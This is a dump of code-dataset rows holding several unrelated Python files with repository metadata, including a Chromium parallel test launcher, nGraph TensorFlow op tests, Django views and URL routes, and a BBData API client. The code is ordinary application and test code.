mvaEleID_Fall17_V1_wp80 = configureVIDMVAEleID( MVA_WP80 )
mvaEleID_Fall17_V1_wpLoose.isPOGApproved = cms.untracked.bool(True)
mvaEleID_Fall17_V1_wp90.isPOGApproved = cms.untracked.bool(True)
mvaEleID_Fall17_V1_wp80.isPOGApproved = cms.untracked.bool(True)
| 54.48 | 124 | 0.727423 | 693 | 5,448 | 5.611833 | 0.350649 | 0.015428 | 0.064798 | 0.023142 | 0.253793 | 0.195166 | 0.181281 | 0.157367 | 0.132168 | 0.132168 | 0 | 0.202083 | 0.171623 | 5,448 | 99 | 125 | 55.030303 | 0.65965 | 0.36362 | 0 | 0 | 0 | 0 | 0.498389 | 0.207735 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.036364 | 0 | 0.036364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
469d44404e5e5089163e7fb2cbe8fd08587f00ec | 4,274 | py | Python | tools/parallel_launcher/parallel_launcher.py | Gitman1989/chromium | 2b1cceae1075ef012fb225deec8b4c8bbe4bc897 | [
"BSD-3-Clause"
] | 2 | 2017-09-02T19:08:28.000Z | 2021-11-15T15:15:14.000Z | tools/parallel_launcher/parallel_launcher.py | meego-tablet-ux/meego-app-browser | 0f4ef17bd4b399c9c990a2f6ca939099495c2b9c | [
"BSD-3-Clause"
] | null | null | null | tools/parallel_launcher/parallel_launcher.py | meego-tablet-ux/meego-app-browser | 0f4ef17bd4b399c9c990a2f6ca939099495c2b9c | [
"BSD-3-Clause"
] | 1 | 2020-11-04T07:22:28.000Z | 2020-11-04T07:22:28.000Z | #!/usr/bin/python
# Copyright (c) 2010 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
This tool launches several shards of a gtest-based binary
in parallel on a local machine.
Example usage:
parallel_launcher.py path/to/base_unittests
"""
import optparse
import os
import subprocess
import sys
import threading
import time
def StreamCopyWindows(stream_from, stream_to):
  """Copy all of stream_from to stream_to in 1 KiB chunks, flushing
  after every write so output appears promptly."""
  chunk = stream_from.read(1024)
  while chunk:
    stream_to.write(chunk)
    stream_to.flush()
    chunk = stream_from.read(1024)
def StreamCopyPosix(stream_from, stream_to, child_exited):
  """Copy stream_from to stream_to until EOF, or until child_exited is
  signaled and no more data is available.

  POSIX-only: uses fcntl to put the source in non-blocking mode so the
  copy loop can periodically check child_exited instead of blocking
  forever on a read.
  """
  # Local imports mirror the original's style; both are POSIX-only or
  # only needed by this function.
  import errno
  import fcntl

  # Put the source stream in a non-blocking mode, so we can check
  # child_exited when there is no data.
  fd = stream_from.fileno()
  fl = fcntl.fcntl(fd, fcntl.F_GETFL)
  fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)

  while True:
    try:
      buf = os.read(fd, 1024)
    except OSError as e:
      # Fixed: use 'except ... as e' (valid on Python 2.6+ and required on
      # Python 3) instead of the py2-only comma form, and the portable
      # errno.EAGAIN constant instead of the Linux-specific literal 11.
      if e.errno == errno.EAGAIN:
        # No data right now; poll the exit flag and retry.
        if child_exited.is_set():
          break
        time.sleep(0.1)
        continue
      raise
    if not buf:
      break
    stream_to.write(buf)
    stream_to.flush()
class TestLauncher(object):
  """Launches one shard of a gtest binary and streams its output.

  The shard is selected via the GTEST_TOTAL_SHARDS / GTEST_SHARD_INDEX
  environment variables understood by gtest binaries.
  """

  def __init__(self, args, executable, num_shards, shard):
    self._args = args
    self._executable = executable
    self._num_shards = num_shards
    self._shard = shard
    self._test = None  # Popen handle, set by launch().

  def launch(self):
    """Start the shard as a subprocess with sharding env vars set."""
    env = os.environ.copy()
    # Give each shard its own Chrome log so they don't clobber each other.
    env['CHROME_LOG_FILE'] = 'chrome_log_%d' % self._shard

    if 'GTEST_TOTAL_SHARDS' in env:
      # Handle the requested sharding transparently.
      outer_shards = int(env['GTEST_TOTAL_SHARDS'])
      outer_index = int(env['GTEST_SHARD_INDEX'])

      env['GTEST_TOTAL_SHARDS'] = str(self._num_shards * outer_shards)

      # Calculate the right shard index to pass to the child. This is going
      # to be a shard of a shard.
      env['GTEST_SHARD_INDEX'] = str((self._num_shards * outer_index) +
                                     self._shard)
    else:
      env['GTEST_TOTAL_SHARDS'] = str(self._num_shards)
      env['GTEST_SHARD_INDEX'] = str(self._shard)

    args = self._args + ['--test-server-shard=' + str(self._shard)]

    self._test = subprocess.Popen(args=args,
                                  executable=self._executable,
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.STDOUT,
                                  env=env)

  def wait(self):
    """Wait for the shard, copying its output to stdout; return its exit
    code."""
    # Fixed: test sys.platform directly instead of subprocess.mswindows,
    # an undocumented internal attribute that was removed in Python 3.5.
    # (In Python 2 it was defined as sys.platform == "win32", so behavior
    # is unchanged.)
    if sys.platform == 'win32':
      stdout_thread = threading.Thread(
          target=StreamCopyWindows,
          args=[self._test.stdout, sys.stdout])
      stdout_thread.start()
      code = self._test.wait()
      stdout_thread.join()
      return code
    else:
      # On POSIX the copier must be told when the child exits, because it
      # polls a non-blocking fd.
      child_exited = threading.Event()
      stdout_thread = threading.Thread(
          target=StreamCopyPosix,
          args=[self._test.stdout, sys.stdout, child_exited])
      stdout_thread.start()
      code = self._test.wait()
      child_exited.set()
      stdout_thread.join()
      return code
def main(argv):
  """Parse options, launch all shards in parallel, and return 0 only if
  every shard exits successfully."""
  parser = optparse.OptionParser()
  parser.add_option("--shards", type="int", dest="shards", default=10)

  # Make it possible to pass options to the launched process.
  # Options for parallel_launcher should be first, then the binary path,
  # and finally - optional arguments for the launched binary.
  parser.disable_interspersed_args()

  options, args = parser.parse_args(argv)

  if not args:
    # Fixed: single-argument parenthesized print works identically on
    # Python 2 (where the original bare print statements were py2-only)
    # and Python 3.
    print('You must provide path to the test binary')
    return 1

  env = os.environ
  # The two gtest sharding variables only make sense together.
  if bool('GTEST_TOTAL_SHARDS' in env) != bool('GTEST_SHARD_INDEX' in env):
    print('Inconsistent environment. GTEST_TOTAL_SHARDS and GTEST_SHARD_INDEX')
    print('should either be both defined, or both undefined.')
    return 1

  # Start all shards first so they run concurrently...
  launchers = []
  for shard in range(options.shards):
    launcher = TestLauncher(args, args[0], options.shards, shard)
    launcher.launch()
    launchers.append(launcher)

  # ...then collect every exit code; any failure fails the whole run.
  return_code = 0
  for launcher in launchers:
    if launcher.wait() != 0:
      return_code = 1

  return return_code
if __name__ == "__main__":
  # Strip the program name before handing the arguments to main().
  sys.exit(main(sys.argv[1:]))
| 27.574194 | 78 | 0.656996 | 569 | 4,274 | 4.746924 | 0.347979 | 0.023695 | 0.035542 | 0.021103 | 0.218808 | 0.139208 | 0.081451 | 0.057016 | 0.0311 | 0.0311 | 0 | 0.007754 | 0.245672 | 4,274 | 154 | 79 | 27.753247 | 0.830025 | 0.139916 | 0 | 0.247525 | 0 | 0 | 0.1141 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.069307 | null | null | 0.029703 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46a4f53ed5b4a611b18a262f155eca68d71783fb | 7,831 | py | Python | test/python/test_elementwise_ops.py | avijit-chakroborty/ngraph-bridge | b691d57412a40582ea93c6e564d80c750b7f2e8e | [
"Apache-2.0"
] | 142 | 2019-02-21T00:53:06.000Z | 2022-03-11T07:46:28.000Z | test/python/test_elementwise_ops.py | tensorflow/ngraph | ea6422491ec75504e78a63db029e7f74ec3479a5 | [
"Apache-2.0"
] | 252 | 2019-03-11T19:27:59.000Z | 2021-03-19T10:58:17.000Z | test/python/test_elementwise_ops.py | tensorflow/ngraph | ea6422491ec75504e78a63db029e7f74ec3479a5 | [
"Apache-2.0"
] | 65 | 2019-03-13T15:27:29.000Z | 2021-07-16T07:09:16.000Z | # ==============================================================================
# Copyright 2018-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""nGraph TensorFlow bridge elementwise operations test
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pytest
import numpy as np
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
from common import NgraphTest
class TestElementwiseOperations(NgraphTest):
    """Element-wise TF ops, checked with and without the nGraph bridge."""

    def _check_binary(self, tf_op, dtype, v1, v2, expected):
        """Feed (v1,) and (v2,) into two placeholders, apply ``tf_op``, and
        assert that the nGraph result matches both the plain-TF result and
        ``expected``."""
        lhs = tf.compat.v1.placeholder(dtype, shape=(None))
        rhs = tf.compat.v1.placeholder(dtype, shape=(None))
        result = tf_op(lhs, rhs)
        sess_fn = lambda sess: sess.run((result,),
                                        feed_dict={
                                            lhs: (v1,),
                                            rhs: (v2,)
                                        })[0]
        assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
        assert (self.with_ngraph(sess_fn) == expected).all()

    @pytest.mark.parametrize(("v1", "v2", "expected"),
                             ((1.0, -1.0, [1.0]), (100, 200, ([200],)),
                              ([0.0, 5.0, 10.0], [6.0],
                               (np.array([[6.0, 6.0, 10.0]]),))))
    def test_maximum(self, v1, v2, expected):
        self._check_binary(tf.maximum, tf.float32, v1, v2, expected)

    @pytest.mark.parametrize(
        ("v1", "v2", "expected"),
        ((1.4, 1.0, [False]), (-1.0, -1.0, ([True],)), (-1.0, 1000, [True]),
         (200, 200, ([True],)), ([-1.0, 1.0, -4], [0.1, 0.1, -4],
                                 (np.array([[True, False, True]]),)),
         ([-1.0, 1.0, -4], [-1.0], (np.array([[True, False, True]]),))))
    def test_less_equal(self, v1, v2, expected):
        self._check_binary(tf.less_equal, tf.float32, v1, v2, expected)

    @pytest.mark.parametrize(
        ("v1", "v2", "expected"),
        ((1.4, 1.0, [False]), (-1.0, -1.0, ([False],)), (-1.0, 1000, [True]),
         (200, 200, ([False],)), ([-1.0, 1.0, -4], [0.1, 0.1, -4],
                                 (np.array([[True, False, False]]),)),
         ([-1.0, 1.0, -4], [-1.0], (np.array([[False, False, True]]),))))
    def test_less(self, v1, v2, expected):
        self._check_binary(tf.less, tf.float32, v1, v2, expected)

    @pytest.mark.parametrize(
        ("v1", "v2", "expected"),
        ((1.4, 1.0, [True]), (-1.0, -1.0, ([True],)), (-1.0, 1000, [False]),
         (200, 200, ([True],)), ([-1.0, 1.0, -4], [0.1, 0.1, -4],
                                 (np.array([[False, True, True]]),)),
         ([-1.0, 1.0, -4], [-1.0], (np.array([[True, True, False]]),))))
    def test_greater_equal(self, v1, v2, expected):
        self._check_binary(tf.greater_equal, tf.float32, v1, v2, expected)

    @pytest.mark.parametrize(
        ("v1", "v2", "expected"),
        ((1.4, 1.0, [True]), (-1.0, -1.0, ([False],)), (-1.0, 1000, [False]),
         (200, 200, ([False],)), ([-1.0, 1.0, -4], [0.1, 0.1, -4],
                                 (np.array([[False, True, False]]),)),
         ([-1.0, 1.0, -4], [-1.0], (np.array([[False, True, False]]),))))
    def test_greater(self, v1, v2, expected):
        self._check_binary(tf.greater, tf.float32, v1, v2, expected)

    @pytest.mark.parametrize(("v1", "v2", "expected"),
                             ((True, True, [True]), (True, False, ([False],)),
                              (1.0, -2.0, ([True],)), (False, 100, ([False],)),
                              ([False, True, False], [True],
                               (np.array([[False, True, False]]),))))
    def test_logical_and(self, v1, v2, expected):
        self._check_binary(tf.logical_and, tf.bool, v1, v2, expected)

    @pytest.mark.parametrize(("test_input", "expected"), ((False, True),
                                                          (True, False)))
    def test_logicalnot_1d(self, test_input, expected):
        flag = tf.compat.v1.placeholder(tf.bool, shape=(1,))
        negated = tf.logical_not(flag)
        sess_fn = lambda sess: sess.run(
            (negated,), feed_dict={flag: (test_input,)})[0]
        assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
        assert (self.with_ngraph(sess_fn) == expected).all()

    def test_logicalnot_2d(self):
        test_input = ((True, False, True), (False, True, False))
        expected = np.logical_not(test_input)
        grid = tf.compat.v1.placeholder(tf.bool, shape=(2, 3))
        negated = tf.logical_not(grid)
        sess_fn = lambda sess: sess.run(
            (negated,), feed_dict={grid: test_input})[0]
        assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
        assert (self.with_ngraph(sess_fn) == expected).all()
| 47.75 | 80 | 0.477461 | 916 | 7,831 | 3.967249 | 0.146288 | 0.024216 | 0.079252 | 0.088057 | 0.724546 | 0.695377 | 0.690424 | 0.66896 | 0.623555 | 0.623555 | 0 | 0.06106 | 0.334951 | 7,831 | 163 | 81 | 48.042945 | 0.636713 | 0.099732 | 0 | 0.576 | 0 | 0 | 0.012806 | 0 | 0 | 0 | 0 | 0 | 0.128 | 1 | 0.064 | false | 0 | 0.056 | 0 | 0.128 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46aa55bc676b909ffd23d501d1007af51f171f16 | 293 | py | Python | mydict.py | zengboming/python | 13018f476554adc3bff831af27c08f7c216d4b09 | [
"Apache-2.0"
] | null | null | null | mydict.py | zengboming/python | 13018f476554adc3bff831af27c08f7c216d4b09 | [
"Apache-2.0"
] | null | null | null | mydict.py | zengboming/python | 13018f476554adc3bff831af27c08f7c216d4b09 | [
"Apache-2.0"
] | null | null | null | #unit
#mydict.py
class Dict(dict):
    """A dict subclass whose keys are also readable/writable as attributes.

    Example: d = Dict(a=1); d.a == 1 and d['a'] == 1; d.b = 2 sets d['b'].
    """

    def __init__(self, **kw):
        super(Dict, self).__init__(**kw)

    def __getattr__(self, key):
        # Called only when normal attribute lookup fails; fall back to the
        # dictionary and translate a missing key into AttributeError, as the
        # attribute protocol requires.
        try:
            return self[key]
        except KeyError:
            # Fixed: error message typo ("han no attribute'%s'" -> proper
            # "has no attribute '%s'").
            raise AttributeError(r"'Dict' object has no attribute '%s'" % key)

    def __setattr__(self, key, value):
        # Attribute assignment stores into the dictionary itself.
        self[key] = value
| 19.533333 | 67 | 0.68942 | 43 | 293 | 4.325581 | 0.604651 | 0.150538 | 0.129032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153584 | 293 | 14 | 68 | 20.928571 | 0.75 | 0.044369 | 0 | 0 | 0 | 0 | 0.122302 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46b1624f4a6a70026386fb13d4c9f4cd8b816721 | 492 | py | Python | server/petsAPI/views.py | StoyanDimStoyanov/ReactDJango | 8c30730fbd3af0064f97444a91e65a9029a1dc0f | [
"MIT"
] | null | null | null | server/petsAPI/views.py | StoyanDimStoyanov/ReactDJango | 8c30730fbd3af0064f97444a91e65a9029a1dc0f | [
"MIT"
] | null | null | null | server/petsAPI/views.py | StoyanDimStoyanov/ReactDJango | 8c30730fbd3af0064f97444a91e65a9029a1dc0f | [
"MIT"
] | null | null | null | from django.shortcuts import render
from rest_framework import generics
# Create your views here.
from petsAPI.models import Pets
from petsAPI.serializers import PetSerializer
def index(req):
    """Render the front-end entry-point page."""
    entry_template = 'index.html'
    return render(req, entry_template)
class PetsListApiView(generics.ListCreateAPIView):
    # DRF generic view: GET lists all pets, POST creates a new one.
    queryset = Pets.objects.all()
    serializer_class = PetSerializer
class PetDetailsApiView(generics.RetrieveUpdateDestroyAPIView):
    # DRF generic view: GET/PUT/PATCH/DELETE a single pet by primary key.
    queryset = Pets.objects.all()
    serializer_class = PetSerializer
46b37f4db1428d7e3e970e352faebde87a24d82f | 7,329 | py | Python | src/bbdata/endpoint/output/objects.py | big-building-data/bbdata-python | 46335c9f8db9ceccbd795c4931db0e3041ba9a50 | [
"MIT"
] | null | null | null | src/bbdata/endpoint/output/objects.py | big-building-data/bbdata-python | 46335c9f8db9ceccbd795c4931db0e3041ba9a50 | [
"MIT"
] | null | null | null | src/bbdata/endpoint/output/objects.py | big-building-data/bbdata-python | 46335c9f8db9ceccbd795c4931db0e3041ba9a50 | [
"MIT"
] | null | null | null | import requests
from bbdata.config import output_api_url
from bbdata.util import handle_response
class Objects:
    """HTTP client for the BBData output-api ``/objects`` endpoints.

    All methods issue a request with the auth headers supplied at
    construction time and return ``handle_response(status, payload)``.
    """

    base_path = "/objects"
    auth = None

    def __init__(self, auth):
        self.auth = auth

    def get_all(self, tags=None, search=None, page=None, per_page=None,
                writable=False):
        """
        Get the list of accessible objects.
        GET /objects
        https://bbdata.daplab.ch/api/#objects_get
        """
        params = {
            "tags": tags,
            "search": search,
            "page": page,
            "perPage": per_page,
            "writable": writable,
        }
        url = output_api_url + self.base_path
        r = requests.get(url, params, headers=self.auth.headers)
        return handle_response(r.status_code, r.json())

    def put(self, name, unit_symbol, owner, description=None):
        """
        Create a new object.
        PUT /objects
        https://bbdata.daplab.ch/api/#objects_put
        """
        json = {
            "name": name,
            "description": description,
            "unitSymbol": unit_symbol,
            'owner': owner
        }
        url = output_api_url + self.base_path
        r = requests.put(url, json=json, headers=self.auth.headers)
        return handle_response(r.status_code, r.json())

    def get(self, object_id):
        """
        Get an object.
        GET /objects/{objectIs}
        https://bbdata.daplab.ch/api/#objects__objectid__get
        """
        url = output_api_url + self.base_path + "/" + str(object_id)
        r = requests.get(url, headers=self.auth.headers)
        # return ObjectResponse(r.json())
        return handle_response(r.status_code, r.json())

    def post(self, object_id, data):
        """
        Edit the name and/or the description of the object.
        Only the properties appearing in the body will be modified.
        POST /objects/{objectId}
        https://bbdata.daplab.ch/api/#objects__objectid__post
        """
        # TODO The data to send isn't define in the API Docs
        url = output_api_url + self.base_path + "/" + str(object_id)
        r = requests.post(url, data, headers=self.auth.headers)
        return handle_response(r.status_code, r.json())

    def delete(self, object_id):
        """
        Delete the object with the given id
        POST /objects/{objectId}
        https://bbdata.daplab.ch/api/#objects__objectid__delete
        """
        # TODO This method is in the Postman profile but isn't in the docs
        url = output_api_url + self.base_path + "/" + str(object_id)
        r = requests.delete(url, headers=self.auth.headers)
        return handle_response(r.status_code, r.json())

    def post_disable(self, object_id):
        """
        Disable this object. All associated tokens will be removed.
        POST /objects/{objectId}/disable
        https://bbdata.daplab.ch/api/#objects__objectid__disable_post
        """
        url = output_api_url + self.base_path + "/" + str(object_id) \
            + "/disable"
        r = requests.post(url, headers=self.auth.headers)
        return handle_response(r.status_code, True)

    def post_enable(self, object_id):
        """
        Enable this object.
        POST /objects/{objectId}/enable
        https://bbdata.daplab.ch/api/#objects__objectid__enable_post
        """
        url = output_api_url + self.base_path + "/" + str(object_id) \
            + "/enable"
        r = requests.post(url, headers=self.auth.headers)
        return handle_response(r.status_code, True)

    def get_tokens(self, object_id, description=None):
        """
        Get the list of tokens for the object. A token is used to submit new
        measures (see input-api).
        An optional description can be passed in the
        body (max 65 characters).
        GET /objects/{objectId}/tokens
        https://bbdata.daplab.ch/api/#objects__objectid__tokens_get
        """
        # TODO The API docs says it's possible to pass an optional description
        # but it looks like it's a mistake for a GET request...
        url = output_api_url + self.base_path + "/" + str(object_id) \
            + "/tokens"
        json = {
            "description": description
        }
        # NOTE(review): the dict is passed positionally, so requests sends it
        # as query parameters, not as a JSON body — confirm against the API.
        r = requests.get(url, json, headers=self.auth.headers)
        return handle_response(r.status_code, r.json())

    def put_tokens(self, object_id):
        """
        Generate a new secured token.
        PUT /objects/{objectId}/tokens
        https://bbdata.daplab.ch/api/#objects__objectid__tokens_put
        """
        # TODO The optional description should probably be added in this
        # method
        url = output_api_url + self.base_path + "/" + str(object_id) \
            + "/tokens"
        r = requests.put(url, headers=self.auth.headers)
        return handle_response(r.status_code, r.json())

    def post_tokens(self, object_id, description):
        """
        Edit the token's description.
        POST /objects/{objectId}/tokens
        https://bbdata.daplab.ch/api/#objects__objectid__tokens_post
        """
        url = output_api_url + self.base_path + "/" + str(object_id) \
            + "/tokens"
        json = {
            "description": description
        }
        r = requests.post(url, json=json, headers=self.auth.headers)
        return handle_response(r.status_code, r.json())

    def delete_tokens(self, object_id, token_id):
        """
        Revoke a token.
        DELETE /objects/{objectId}/tokens
        https://bbdata.daplab.ch/api/#objects__objectid__tokens_delete
        """
        url = output_api_url + self.base_path + "/" + str(object_id) \
            + "/tokens"
        params = {
            "tokenId": token_id
        }
        r = requests.delete(url, params=params, headers=self.auth.headers)
        return handle_response(r.status_code, True)

    def put_tags(self, object_id, tags):
        """
        Add tags to the object.
        PUT /objects/{objectId}/tags
        https://bbdata.daplab.ch/api/#objects__objectid__tags_put
        """
        url = output_api_url + self.base_path + "/" + str(object_id) \
            + "/tags"
        params = {
            "tags": tags
        }
        r = requests.put(url, params=params, headers=self.auth.headers)
        return handle_response(r.status_code, True)

    def delete_tags(self, object_id, tags):
        """
        Remove tags.
        DELETE /objects/{objectId}/tags
        https://bbdata.daplab.ch/api/#objects__objectid__tags_delete
        """
        url = output_api_url + self.base_path + "/" + str(object_id) \
            + "/tags"
        params = {
            "tags": tags
        }
        # Fixed: this endpoint is a DELETE, but the previous code issued the
        # exact same PUT request as put_tags, so tags were never removed.
        r = requests.delete(url, params=params, headers=self.auth.headers)
        return handle_response(r.status_code, True)

    def get_comments(self, object_id):
        """
        Get all comments attached to this object. Use the /comments endpoint
        for more actions.
        GET /objects/{objectId}/comments
        https://bbdata.daplab.ch/api/#objects__objectid__comments_get
        """
        url = output_api_url + self.base_path + "/" + str(object_id) \
            + "/comments"
        r = requests.get(url, headers=self.auth.headers)
        return handle_response(r.status_code, r.json())
| 33.619266 | 78 | 0.592714 | 894 | 7,329 | 4.661074 | 0.147651 | 0.046076 | 0.043197 | 0.063835 | 0.62395 | 0.594912 | 0.594912 | 0.542117 | 0.542117 | 0.513799 | 0 | 0.000386 | 0.292673 | 7,329 | 217 | 79 | 33.774194 | 0.803434 | 0.301132 | 0 | 0.5 | 0 | 0 | 0.039302 | 0 | 0 | 0 | 0 | 0.018433 | 0 | 1 | 0.147059 | false | 0 | 0.029412 | 0 | 0.343137 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46b4aae481a7dcad8401c1fdb98aae95f3b590c6 | 2,207 | py | Python | api/patients/urls.py | Wellheor1/l2 | d980210921c545c68fe9d5522bb693d567995024 | [
"MIT"
] | 10 | 2018-03-14T06:17:06.000Z | 2022-03-10T05:33:34.000Z | api/patients/urls.py | Wellheor1/l2 | d980210921c545c68fe9d5522bb693d567995024 | [
"MIT"
] | 512 | 2018-09-10T07:37:34.000Z | 2022-03-30T02:23:43.000Z | api/patients/urls.py | D00dleman/l2 | 0870144537ee340cd8db053a608d731e186f02fb | [
"MIT"
] | 24 | 2018-07-31T05:52:12.000Z | 2022-02-08T00:39:41.000Z | from django.urls import path
from . import views
urlpatterns = [
    # Card / individual search.
    path('search-card', views.patients_search_card),
    path('search-individual', views.patients_search_individual),
    path('search-l2-card', views.patients_search_l2_card),
    path('create-l2-individual-from-card', views.create_l2_individual_from_card),
    # Card CRUD and archiving.
    path('card/<int:card_id>', views.patients_get_card_data),
    path('card/save', views.patients_card_save),
    path('card/archive', views.patients_card_archive),
    path('card/unarchive', views.patients_card_unarchive),
    # Individual lookups and edits.
    path('individuals/search', views.individual_search),
    path('individuals/sex', views.get_sex_by_param),
    path('individuals/edit-doc', views.edit_doc),
    path('individuals/edit-agent', views.edit_agent),
    path('individuals/update-cdu', views.update_cdu),
    path('individuals/update-wia', views.update_wia),
    # Synchronization with external systems (RMIS, TFOMS).
    path('individuals/sync-rmis', views.sync_rmis),
    path('individuals/sync-tfoms', views.sync_tfoms),
    # Loaders for individual-related data.
    path('individuals/load-anamnesis', views.load_anamnesis),
    path('individuals/load-dreg', views.load_dreg),
    path('individuals/load-screening', views.load_screening),
    path('individuals/load-vaccine', views.load_vaccine),
    path('individuals/load-ambulatory-data', views.load_ambulatory_data),
    path('individuals/load-benefit', views.load_benefit),
    path('individuals/load-dreg-detail', views.load_dreg_detail),
    path('individuals/load-vaccine-detail', views.load_vaccine_detail),
    path('individuals/load-ambulatorydata-detail', views.load_ambulatory_data_detail),
    path('individuals/load-ambulatory-history', views.load_ambulatory_history),
    path('individuals/load-benefit-detail', views.load_benefit_detail),
    # Savers for individual-related data.
    path('individuals/save-dreg', views.save_dreg),
    path('individuals/save-plan-dreg', views.update_dispensary_reg_plans),
    path('individuals/save-vaccine', views.save_vaccine),
    path('individuals/save-ambulatory-data', views.save_ambulatory_data),
    path('individuals/save-benefit', views.save_benefit),
    path('individuals/save-anamnesis', views.save_anamnesis),
    # Miscellaneous.
    path('is-card', views.is_l2_card),
    path('save-screening-plan', views.update_screening_reg_plan),
]
| 53.829268 | 86 | 0.752152 | 284 | 2,207 | 5.623239 | 0.169014 | 0.234815 | 0.13087 | 0.046963 | 0.032561 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00252 | 0.101042 | 2,207 | 40 | 87 | 55.175 | 0.802419 | 0 | 0 | 0 | 0 | 0 | 0.354327 | 0.275487 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.051282 | 0 | 0.051282 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46b5e33d3c7311128739c73f9d648a67b6c52c18 | 1,139 | py | Python | resolwe_bio/kb/migrations/0002_alter_field_max_length.py | JureZmrzlikar/resolwe-bio | 54cde9b293abebad2db0564c9fefa33d6d2fe835 | [
"Apache-2.0"
] | null | null | null | resolwe_bio/kb/migrations/0002_alter_field_max_length.py | JureZmrzlikar/resolwe-bio | 54cde9b293abebad2db0564c9fefa33d6d2fe835 | [
"Apache-2.0"
] | null | null | null | resolwe_bio/kb/migrations/0002_alter_field_max_length.py | JureZmrzlikar/resolwe-bio | 54cde9b293abebad2db0564c9fefa33d6d2fe835 | [
"Apache-2.0"
] | 1 | 2021-09-03T08:50:54.000Z | 2021-09-03T08:50:54.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.11 on 2016-11-15 07:06
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: widens Feature text fields (aliases base
    field to 256 chars, name to 1024) and constrains sub_type to a fixed
    choice set of feature types."""

    dependencies = [
        ('resolwe_bio_kb', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='feature',
            name='aliases',
            field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=256), blank=True, default=[], size=None),
        ),
        migrations.AlterField(
            model_name='feature',
            name='name',
            field=models.CharField(max_length=1024),
        ),
        migrations.AlterField(
            model_name='feature',
            name='sub_type',
            field=models.CharField(choices=[(b'protein-coding', b'Protein-coding'), (b'pseudo', b'Pseudo'), (b'rRNA', b'rRNA'), (b'ncRNA', b'ncRNA'), (b'snRNA', b'snRNA'), (b'snoRNA', b'snoRNA'), (b'tRNA', b'tRNA'), (b'asRNA', b'asRNA'), (b'other', b'Other'), (b'unknown', b'Unknown')], max_length=20),
        ),
    ]
| 35.59375 | 302 | 0.604039 | 137 | 1,139 | 4.905109 | 0.489051 | 0.089286 | 0.111607 | 0.129464 | 0.264881 | 0.178571 | 0 | 0 | 0 | 0 | 0 | 0.034091 | 0.227392 | 1,139 | 31 | 303 | 36.741935 | 0.729545 | 0.059701 | 0 | 0.375 | 1 | 0 | 0.17603 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3b2063cf7dc483f806ac22531b14a9333116ffb | 1,092 | py | Python | radioepg/migrations/0001_initial.py | mervij/radiodns | 01543cf1e4de8de335af0301616e089c35fc67f8 | [
"Apache-2.0"
